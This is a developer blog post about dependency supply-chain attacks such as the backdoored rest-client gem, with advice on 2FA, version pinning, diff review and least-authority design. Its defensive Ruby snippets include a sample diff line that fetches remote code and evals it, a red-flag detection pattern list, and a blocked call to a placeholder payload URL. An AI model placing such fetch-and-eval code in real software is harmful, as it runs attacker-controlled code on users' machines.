Compromised accounts, back doors, and automatically updating dependencies


Once again the dev community is reminded that although we sometimes imagine we're building one well-founded layer upon another, reality can be a bit more... sand castle at high tide. Basket of eggs. House of cards. 🃏🃏🃏

Several years ago, a developer was strong-armed into renaming his npm module, so he took his ball and went home, unpublishing it and leaving thousands of projects in a broken state. Last year, the popular npm module event-stream was handed off to an unknown "volunteer", who turned out not to have the best of intentions (understatement).

And a week ago, the rest-client gem was updated with malicious code that, among other things, called out to a pastebin file and executed its contents. It was pulled in by about a thousand projects before it was yanked a couple of days ago and replaced with a clean version. This time it was a developer's RubyGems account that was hacked, which gave the attacker the access needed to publish the malicious update. It happens.

This'll make the circuit through the dev community for a while, but it's not the first time something like this has happened, and it certainly won't be the last. Is there anything we can do?

Reasonable Precautions

Problems like these will likely always be with us, and although nothing's foolproof, it'd be wrong to say there's nothing we can do. Here are two precautions that come to mind, either of which likely would've prevented the RubyGems incident from happening at all...

Secure your code (by securing your accounts)

2FA should be enforced, not just an option to enable. If someone guessed that dev's RubyGems password, they'd have been unlikely to gain access if he'd also had 2FA enabled. In fact, especially in light of the recent git ransom campaign that hit compromised accounts across several repo platforms, our team at work decided to require 2FA for the whole organization. Here are more ways to secure GitHub too.

I have a number of browser extensions and a package on NuGet, which between them have a couple thousand users who'd be affected if my accounts were hacked and malicious code uploaded. NuGet packages don't auto-update by default, but most browsers do. You can easily enable 2FA for your Chrome, Firefox, Microsoft, RubyGems, and myriad other accounts. Doing so doesn't just protect you, but anyone using your code too!

Don't automatically update third-party dependencies

Visual Studio won't (afaik) update NuGet packages automatically during the build process, but build tools for other languages do.

In Erlang, for example, rebar3 provides several ways to specify which version of a dependency to grab. Of all the following, specifying the exact commit (ref) you're interested in is the safest way to go. That commit represents a snapshot in time that won't change as development continues.

{deps, [
    rebar,                                   % latest version of the package
    {rebar, "1.0.0"},                        % a specific published version
    {rebar, {git, "", {branch, "master"}}},  % tip of a branch (moves over time)
    {rebar, {git, "", {tag, "1.0.0"}}},      % a tag (can be deleted or moved)
    {rebar, {git, "", {ref, "7f73b8d6"}}}    % an exact commit (safest)
]}.

Similarly in Ruby, Bundler's Gemfile provides several ways to specify versions. Of the following, the optimistic version constraint >= 1.0 is the least secure. The pessimistic constraint ~> 1.1 isn't much better. In fact, those thousand people affected by the rest-client hack could've had ~> 1.6.12 and still been affected. If they knew they wanted that particular legacy version, they could have specified '1.6.12'.

gem 'nokogiri'                # no constraint: latest version wins
gem 'rails', '3.0.0.beta3'    # exact version
gem 'rack',  '>= 1.0'         # optimistic: 1.0 or anything newer
gem 'thin',  '~> 1.1'         # pessimistic: >= 1.1 and < 2.0
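To see concretely why the pessimistic constraint wouldn't have helped, here's a quick check using RubyGems' own Gem::Requirement class, with the version numbers from the rest-client example above (1.6.13 standing in for a later, compromised patch release):

```ruby
require 'rubygems'  # provides Gem::Requirement and Gem::Version

pessimistic = Gem::Requirement.new('~> 1.6.12')  # allows >= 1.6.12, < 1.7
exact       = Gem::Requirement.new('1.6.12')     # allows 1.6.12 only

# A later patch release still satisfies the pessimistic
# constraint, but not the exact pin.
puts pessimistic.satisfied_by?(Gem::Version.new('1.6.13'))  # true
puts exact.satisfied_by?(Gem::Version.new('1.6.13'))        # false
```

In other words, `~>` guards against breaking API changes, not against a malicious patch release pushed from a compromised account.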

No matter what language or build tool you're using, the best thing you can do is check out the source for a project you want to use, so you're reasonably sure it's doing what it's supposed to do, and then lock your project to that specific version. Updating to a newer version should be a deliberate, conscious action, not a roll of the dice.
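Bundler can take that one step further than an exact version number: point the gem at a git repository and the exact commit you reviewed, much like the rebar3 ref example above. A minimal sketch (the URL and SHA below are hypothetical placeholders, not a real recommendation):

```ruby
# Gemfile: pin a dependency to the exact commit you reviewed.
# Repository URL and SHA are made-up placeholders.
gem 'some-gem', git: 'https://example.com/some/gem.git', ref: 'abc1234'
```

With a pin like this, even a malicious release pushed to the package registry can't reach your build; only a new, deliberately chosen ref changes what you get.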

Inspect updates to third-party dependencies

No one can expect a joe-regular browser user to inspect their extensions before updating them, even if there were a way to disable automatic updates. But we devs are paid to understand this stuff, and to protect the end user from bad code. Luckily, Jussi Koljonen did just that when he noticed the compromised update to the rest-client gem the other day. Would you or I have? Maybe, maybe not.

Following on the heels of targeting a single version of a dependency, when you do decide to move to a newer version, it's a good idea to review the differences. If it's a big change, it might not be reasonable to understand everything, but looking at a git diff, most of us would spot a new piece of code that downloads an external file and executes its contents.
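As a toy illustration of the sort of red flag to look for, here's a naive scanner that flags diff lines combining remote fetches with eval, the pattern used in the rest-client backdoor. The patterns are my own examples, and this is no substitute for actually reading the diff:

```ruby
# Flag lines in a diff that look like they fetch and execute remote
# code. Illustrative only; real review means reading the whole diff.
RED_FLAGS = [/\beval\b/, /Net::HTTP/, /open-uri/, /pastebin/i].freeze

def suspicious_lines(diff)
  diff.each_line.with_index(1)
      .select { |line, _n| RED_FLAGS.any? { |re| re.match?(line) } }
      .map    { |line, n| [n, line.strip] }
end

diff = <<~DIFF
  + require 'net/http'
  + eval(Net::HTTP.get(URI(remote_url)))
DIFF

suspicious_lines(diff).each { |n, line| puts "line #{n}: #{line}" }
```

A tool like this only narrows where to look; the malicious code in a real incident may well be obfuscated past what any simple pattern would catch.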

Reasonable Solutions

None of the above are foolproof solutions, just reasonable precautions to take. Even if you follow them and all the other advice you'll find online, there are no guarantees. 2FA won't save you if GitHub or RubyGems itself is hacked. Inspecting the code won't help if it's minified, obfuscated, or so complex that it's nearly impossible to decipher anyway.

When it comes to natural disasters, like tornadoes and earthquakes and hurricanes, no one talks about stopping them. You take precautions - board up windows, move to the center of a building, don't wave a golf club over your head in a storm. You can play it smart, but the reality is that you can't stop everything. So you mitigate. Lessen the damage. I think the same applies here.

Principle of Least Authority (POLA)

There's a concept called the Principle of Least Authority (POLA), which we already use in browser extensions and on mobile devices, but it hasn't been adopted everywhere, and even where it has, it hasn't always been implemented well. Basically, if rest-client had no reason to retrieve and execute remote files, then the malicious code injected into it shouldn't have been able to either... at least, not without somehow prompting the consumer to allow more privileges, which likely would have raised red flags.
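A rough sketch of what that could look like in code, using a made-up RestClientish class: instead of the library reaching for ambient network access on its own, the consumer hands it only the capability it's willing to grant. All names here are hypothetical:

```ruby
# Capability-style sketch (hypothetical API). The consumer decides what
# authority the dependency gets; a compromised dependency can't reach
# beyond what it was handed.
class NoNetwork
  def get(_uri)
    raise SecurityError, 'this dependency was not granted network access'
  end
end

class RestClientish
  def initialize(http:)  # the network capability is injected, not ambient
    @http = http
  end

  def fetch(uri)
    @http.get(uri)
  end
end

client = RestClientish.new(http: NoNetwork.new)

begin
  client.fetch('https://pastebin.example/payload')
rescue SecurityError => e
  puts e.message  # the injected malicious call is stopped here
end
```

The point isn't this particular pattern; it's that authority flows explicitly from the consumer, so malicious code added to the dependency has nothing extra to grab.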

Check out POLA Today Keeps the Virus at Bay by Alan Karp for a good introduction. If you prefer videos, check out the talk Alan gave at Google, posted below.

A suitable flaw in any piece of software, written by Microsoft or anyone else, can be used to grant an attacker all the privileges of the user. Reducing the number of such flaws will make finding points of attack harder, but once one is found, it is likely to be exploited. The mistake is in asking "How can we prevent attacks?" when we should be asking "How can we limit the damage that can be done when an attack succeeds?". The former assumes infallibility; the latter recognizes that building systems is a human process.

Then check out POLA Would Have Prevented the Event-Stream Incident. The comments are worth reading too. It's the first time I've heard the term POLA, even though I've applied the principle before. I never considered how it could be extended to the apps we develop, the OSes we use, etc. Now I want to investigate some of the things Alan mentions in his talk, like the E programming language and a virus-safe (not necessarily virus-free!) computing environment.

At the end of the day, it's a shame we have to jump through these hoops at all. It's not enough to have a curiosity about how things work - it needs to be focused correctly. Some people create things, because creating is fulfilling. Others destroy things, just because they can.


Grant Winney

I write when I've got something to share - a personal project, a solution to a difficult problem, or just an idea. We learn by doing and sharing. We've all got something to contribute.
